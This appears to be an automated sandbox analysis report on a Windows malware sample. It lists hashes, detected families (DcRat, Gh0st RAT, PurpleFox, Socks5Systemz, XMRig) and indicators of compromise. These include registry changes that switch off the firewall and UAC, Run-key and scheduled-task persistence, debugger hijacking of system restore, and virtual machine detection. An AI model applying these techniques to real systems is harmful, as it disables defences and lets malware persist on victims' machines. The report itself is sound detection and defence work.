Resubmissions
11-02-2024 08:10
240211-j212ragb47 1011-02-2024 08:09
240211-j2kprseb2w 1009-02-2024 18:28
240209-w4c4xsde9t 1002-02-2024 12:52
240202-p4dxwsgfej 1002-02-2024 12:45
240202-pzapnsgdbp 1016-01-2024 15:29
240116-sw8dbaehh3 1010-01-2024 14:41
240110-r2wq2ahchl 1010-01-2024 13:29
240110-qrqatshbg3 1022-12-2023 08:48
231222-kqp1sadghq 10Analysis
-
max time kernel
1801s -
max time network
1807s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2024 15:29
Static task
static1
Behavioral task
behavioral1
Sample
4363463463464363463463463.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
4363463463464363463463463.exe
Resource
win10-20231220-en
Behavioral task
behavioral3
Sample
4363463463464363463463463.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral4
Sample
4363463463464363463463463.exe
Resource
win11-20231215-en
General
-
Target
4363463463464363463463463.exe
-
Size
10KB
-
MD5
2a94f3960c58c6e70826495f76d00b85
-
SHA1
e2a1a5641295f5ebf01a37ac1c170ac0814bb71a
-
SHA256
2fcad226b17131da4274e1b9f8f31359bdd325c9568665f08fd1f6c5d06a23ce
-
SHA512
fbf55b55fcfb12eb8c029562956229208b9e8e2591859d6336c28a590c92a4d0f7033a77c46ef6ebe07ddfca353aba1e84b51907cd774beab148ee901c92d62f
-
SSDEEP
192:xlwayyHOXGc20L7BIW12n/ePSjiTlzkGu8stYcFwVc03KY:xlwwHe/20PKn/cLTlHuptYcFwVc03K
Malware Config
Signatures
-
DcRat 18 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description ioc pid Process 5360 schtasks.exe 5860 schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\Root 4363463463464363463463463.exe 3536 schtasks.exe 60 schtasks.exe 3320 schtasks.exe 4376 schtasks.exe 5776 schtasks.exe 4556 schtasks.exe 5688 schtasks.exe 1200 schtasks.exe 8 schtasks.exe 5936 schtasks.exe 5424 schtasks.exe Set value (str) \REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sasuke = "C:\\Users\\Admin\\AppData\\Roaming\\sasuke.exe" 0j4.exe 5448 schtasks.exe 2776 schtasks.exe 4584 schtasks.exe -
resource yara_rule behavioral3/memory/4312-111-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/4312-113-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/1728-121-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/1728-120-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/1728-122-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/4312-135-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/1728-139-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/3888-143-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit behavioral3/memory/3888-481-0x0000000010000000-0x00000000101B9000-memory.dmp purplefox_rootkit -
Detect Socks5Systemz Payload 3 IoCs
resource yara_rule behavioral3/memory/1384-528-0x0000000000AF0000-0x0000000000B92000-memory.dmp family_socks5systemz behavioral3/memory/1384-531-0x0000000000AF0000-0x0000000000B92000-memory.dmp family_socks5systemz behavioral3/memory/1384-548-0x0000000000AF0000-0x0000000000B92000-memory.dmp family_socks5systemz -
Detect ZGRat V1 2 IoCs
resource yara_rule behavioral3/files/0x00060000000232d6-1528.dat family_zgrat_v1 behavioral3/files/0x00060000000232f6-5017.dat family_zgrat_v1 -
Gh0st RAT payload 9 IoCs
resource yara_rule behavioral3/memory/4312-111-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/4312-113-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/1728-121-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/1728-120-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/1728-122-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/4312-135-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/1728-139-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/3888-143-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat behavioral3/memory/3888-481-0x0000000010000000-0x00000000101B9000-memory.dmp family_gh0strat -
Modifies firewall policy service 2 TTPs 56 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" explorer.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0" explorer.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile explorer.exe -
Modifies security service 2 TTPs 5 IoCs
description ioc Process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe -
Socks5Systemz
Socks5Systemz is a botnet written in C++.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
description pid Process procid_target PID 4608 created 3352 4608 Aztec.exe 43 PID 4608 created 3352 4608 Aztec.exe 43 PID 4608 created 3352 4608 Aztec.exe 43 PID 4608 created 3352 4608 Aztec.exe 43 PID 4608 created 3352 4608 Aztec.exe 43 PID 4344 created 3352 4344 updater.exe 43 PID 4344 created 3352 4344 updater.exe 43 PID 4344 created 3352 4344 updater.exe 43 PID 4344 created 3352 4344 updater.exe 43 PID 4344 created 3352 4344 updater.exe 43 PID 392 created 3352 392 conhost.exe 43 PID 4344 created 3352 4344 updater.exe 43 -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" InstallSetup2.exe -
XMRig Miner payload 10 IoCs
resource yara_rule behavioral3/memory/1552-498-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-502-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-504-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-511-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-516-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-521-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-527-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/memory/1552-537-0x00007FF7CDFE0000-0x00007FF7CE7D4000-memory.dmp xmrig behavioral3/files/0x00060000000232bb-1142.dat family_xmrig behavioral3/files/0x00060000000232bb-1142.dat xmrig -
Enumerates VirtualBox registry keys 2 TTPs 64 IoCs
description ioc Process Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService rundll32.EXE Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo rundll32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxVideo 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest rundll32.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxVideo explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxVideo 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxService 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService 139k3s9mie973k.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxMouse explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxVideo 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxGuest 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF explorer.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxGuest explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxService 139k3s9mie973k.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxMouse explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VBoxSF explorer.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ AUTOKEY.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 334 2776 schtasks.exe 417 2624 rundll32.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
description ioc Process File created C:\Windows\System32\drivers\etc\hosts Aztec.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Looks for VMWare services registry key. 1 TTPs 27 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware UdioConverterRipper.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware hueeirv Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware is-I2SOJ.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware StringIds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware jxszdjp.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware IEXPLORE.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware 360TS_Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware tuc4.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware BroomSetup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware is-RKAFE.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware jsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware 360TS_Setup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware DpJ873NtgAlrFVbXX7h6FnM9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware qI7aPgVljoENRNVrUTEUh6Bq.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware qhD0Fjd2sS2bPUQL1AQPs2sm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware assistant_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware uLBknOhgdGBcPr4C2VIutNtS.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware 5OOy4aNueB5QpC3S0HgRtZvH.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware NBYS%20ASM.NET.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware VoidRAT.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\VMware hreeirv -
Modifies Windows Firewall 1 TTPs 2 IoCs
pid Process 5492 netsh.exe 1432 netsh.exe -
Sets file execution options in registry 2 TTPs 30 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "iupcwtk.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "aey.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "oha.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "pyrfutdibr.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "mzj.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "pzslse.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "wdjewytgcb.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "jqeobpaoog.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "zsv.exe" explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "gzb.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\139k3s9mie973k.exe\DisableExceptionChainValidation schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "wgje.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe\Debugger = "dgidybqtu.exe" explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\139k3s9mie973k.exe schtasks.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe explorer.exe Set value (str) 